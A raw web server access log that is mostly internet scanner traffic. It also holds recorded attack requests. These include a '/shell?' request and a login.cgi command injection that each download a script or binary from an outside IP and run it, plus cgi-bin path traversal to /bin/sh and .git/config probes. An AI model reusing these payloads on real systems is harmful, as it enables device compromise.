185.191.126.213 - - [03/Oct/2024:00:54:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:00:55:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.77.202 - - [03/Oct/2024:00:58:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; EML-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
185.191.126.213 - - [03/Oct/2024:01:00:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [03/Oct/2024:01:00:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [03/Oct/2024:01:00:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; EML-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
80.82.77.202 - - [03/Oct/2024:01:01:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; EML-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
185.191.126.213 - - [03/Oct/2024:01:02:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.43 - - [03/Oct/2024:01:02:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.39.118 - - [03/Oct/2024:01:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.79 - - [03/Oct/2024:01:03:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
147.185.133.63 - - [03/Oct/2024:01:07:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [03/Oct/2024:01:10:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.43 - - [03/Oct/2024:01:10:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.142.125.217 - - [03/Oct/2024:01:11:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.217 - - [03/Oct/2024:01:11:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.217 - - [03/Oct/2024:01:11:36 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.217 - - [03/Oct/2024:01:11:37 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
8.220.201.94 - - [03/Oct/2024:01:12:28 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
185.16.39.118 - - [03/Oct/2024:01:14:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.65 - - [03/Oct/2024:01:15:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [03/Oct/2024:01:16:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.213.187.244 - - [03/Oct/2024:01:19:26 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
167.94.138.121 - - [03/Oct/2024:01:24:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.121 - - [03/Oct/2024:01:24:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.121 - - [03/Oct/2024:01:24:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.121 - - [03/Oct/2024:01:24:48 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
35.203.211.221 - - [03/Oct/2024:01:25:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
137.74.239.154 - - [03/Oct/2024:01:27:48 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
137.74.239.157 - - [03/Oct/2024:01:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
185.16.39.118 - - [03/Oct/2024:01:27:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [03/Oct/2024:01:31:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:01:33:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:01:35:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [03/Oct/2024:01:37:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.191.126.213 - - [03/Oct/2024:01:37:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.43 - - [03/Oct/2024:01:38:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.43 - - [03/Oct/2024:01:41:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.43 - - [03/Oct/2024:01:42:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [03/Oct/2024:01:44:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [03/Oct/2024:01:45:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
45.156.129.46 - - [03/Oct/2024:01:47:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
95.214.55.43 - - [03/Oct/2024:01:48:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.47 - - [03/Oct/2024:01:50:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
147.185.133.230 - - [03/Oct/2024:01:53:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
95.214.55.43 - - [03/Oct/2024:01:53:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.222.242.165 - - [03/Oct/2024:01:54:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
188.166.71.161 - - [03/Oct/2024:01:57:55 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
188.166.71.161 - - [03/Oct/2024:01:57:58 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
188.166.71.161 - - [03/Oct/2024:01:58:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
76.11.185.195 - - [03/Oct/2024:01:58:12 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 192.210.162.147/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1" 404 306 "-" "r00ts3c-owned-you"
95.214.55.43 - - [03/Oct/2024:01:58:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [03/Oct/2024:02:02:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [03/Oct/2024:02:03:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
149.50.103.48 - - [03/Oct/2024:02:05:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [03/Oct/2024:02:09:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
149.50.103.48 - - [03/Oct/2024:02:10:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
54.92.235.241 - - [03/Oct/2024:02:11:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
149.50.103.48 - - [03/Oct/2024:02:13:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [03/Oct/2024:02:16:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:02:19:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:02:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [03/Oct/2024:02:31:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
141.98.11.79 - - [03/Oct/2024:02:31:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.77.202 - - [03/Oct/2024:02:32:18 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
149.50.103.48 - - [03/Oct/2024:02:33:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.128.43 - - [03/Oct/2024:02:33:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
141.98.11.79 - - [03/Oct/2024:02:35:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [03/Oct/2024:02:37:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
149.50.103.48 - - [03/Oct/2024:02:40:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
104.248.130.34 - - [03/Oct/2024:02:43:24 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
104.248.130.34 - - [03/Oct/2024:02:43:29 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
104.248.130.34 - - [03/Oct/2024:02:43:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.213 - - [03/Oct/2024:02:44:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [03/Oct/2024:02:45:20 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [03/Oct/2024:02:45:27 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [03/Oct/2024:02:45:36 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [03/Oct/2024:02:45:37 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [03/Oct/2024:02:46:06 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
149.50.103.48 - - [03/Oct/2024:02:46:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:02:46:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [03/Oct/2024:02:46:31 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [03/Oct/2024:02:48:03 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
93.174.93.12 - - [03/Oct/2024:02:48:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
37.139.5.66 - - [03/Oct/2024:02:49:00 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
95.214.55.138 - - [03/Oct/2024:02:51:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.132.239 - - [03/Oct/2024:02:51:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
149.50.103.48 - - [03/Oct/2024:02:51:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:02:52:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:02:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [03/Oct/2024:02:56:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.47 - - [03/Oct/2024:02:59:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.191.126.213 - - [03/Oct/2024:02:59:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.79 - - [03/Oct/2024:02:59:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [03/Oct/2024:02:59:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [03/Oct/2024:03:00:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:03:00:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [03/Oct/2024:03:04:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.128.45 - - [03/Oct/2024:03:04:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.235.24.30 - - [03/Oct/2024:03:04:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.30 - - [03/Oct/2024:03:04:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.138 - - [03/Oct/2024:03:08:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [03/Oct/2024:03:10:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:03:11:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.90.226.218 - - [03/Oct/2024:03:13:12 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
185.224.128.47 - - [03/Oct/2024:03:13:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
43.153.122.30 - - [03/Oct/2024:03:18:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
47.245.122.65 - - [03/Oct/2024:03:20:35 +0200] "GET http://www.1ucn.com/proxychecker/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; N_o_k_i_a)"
43.159.141.180 - - [03/Oct/2024:03:26:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.235.24.176 - - [03/Oct/2024:03:26:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
95.214.55.138 - - [03/Oct/2024:03:29:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.200 - - [03/Oct/2024:03:32:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
95.214.55.138 - - [03/Oct/2024:03:32:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.236.176.150 - - [03/Oct/2024:03:33:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
154.213.187.244 - - [03/Oct/2024:03:35:30 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
95.214.55.138 - - [03/Oct/2024:03:35:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
164.90.166.92 - - [03/Oct/2024:03:37:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
164.90.166.92 - - [03/Oct/2024:03:37:53 +0200] "GET /odinhttpcall1727918719 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.90.166.92 - - [03/Oct/2024:03:37:53 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.90.166.92 - - [03/Oct/2024:03:37:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
164.90.166.92 - - [03/Oct/2024:03:37:53 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.90.166.92 - - [03/Oct/2024:03:37:53 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.90.166.92 - - [03/Oct/2024:03:37:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
164.90.166.92 - - [03/Oct/2024:03:37:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
104.248.20.143 - - [03/Oct/2024:03:37:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.226.112.150 - - [03/Oct/2024:03:37:53 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
142.93.162.193 - - [03/Oct/2024:03:37:53 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
64.226.112.150 - - [03/Oct/2024:03:37:53 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
142.93.163.112 - - [03/Oct/2024:03:37:53 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
104.248.20.143 - - [03/Oct/2024:03:37:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
104.248.20.143 - - [03/Oct/2024:03:37:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.226.112.150 - - [03/Oct/2024:03:37:54 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
104.248.20.143 - - [03/Oct/2024:03:37:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
52.76.71.100 - - [03/Oct/2024:03:37:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
147.185.132.15 - - [03/Oct/2024:03:38:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.15 - - [03/Oct/2024:03:38:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:38:09 +0200] "" 501 315 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:38:18 +0200] "" 501 315 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:38:20 +0200] "" 501 315 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:38:38 +0200] "" 501 315 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:38:39 +0200] "" 501 315 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:38:48 +0200] "" 501 315 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:38:51 +0200] "" 501 315 "-" "-"
87.120.115.119 - - [03/Oct/2024:03:38:58 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 9; SM-N950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
18.175.120.105 - - [03/Oct/2024:03:39:01 +0200] "" 501 315 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:39:03 +0200] "" 501 315 "-" "-"
87.120.115.119 - - [03/Oct/2024:03:39:41 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-E700H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36"
64.62.197.3 - - [03/Oct/2024:03:39:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:40:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.120.115.119 - - [03/Oct/2024:03:40:14 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; FreeBSD i386; rv:28.0) Gecko/20100101 Firefox/28.0 SeaMonkey/2.25"
87.120.115.119 - - [03/Oct/2024:03:40:14 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
18.175.120.105 - - [03/Oct/2024:03:41:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.120.115.119 - - [03/Oct/2024:03:41:24 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2"
87.120.115.119 - - [03/Oct/2024:03:41:25 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; CrOS x86_64 5841.83.0) AppleWebKit/537.36 (KHTML like Gecko) Chrome/36.0.1985.138 Safari/537.36"
87.120.115.119 - - [03/Oct/2024:03:41:58 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.102 Safari/537.36 Vivaldi/2.6.1566.44"
206.189.233.163 - - [03/Oct/2024:03:41:58 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
87.120.115.119 - - [03/Oct/2024:03:42:49 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:35.0) Gecko/20100101 Firefox/35.0"
87.120.115.119 - - [03/Oct/2024:03:42:49 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36"
87.120.115.119 - - [03/Oct/2024:03:42:50 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G930A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
18.175.120.105 - - [03/Oct/2024:03:43:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:43:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.138 - - [03/Oct/2024:03:44:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.47 - - [03/Oct/2024:03:45:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
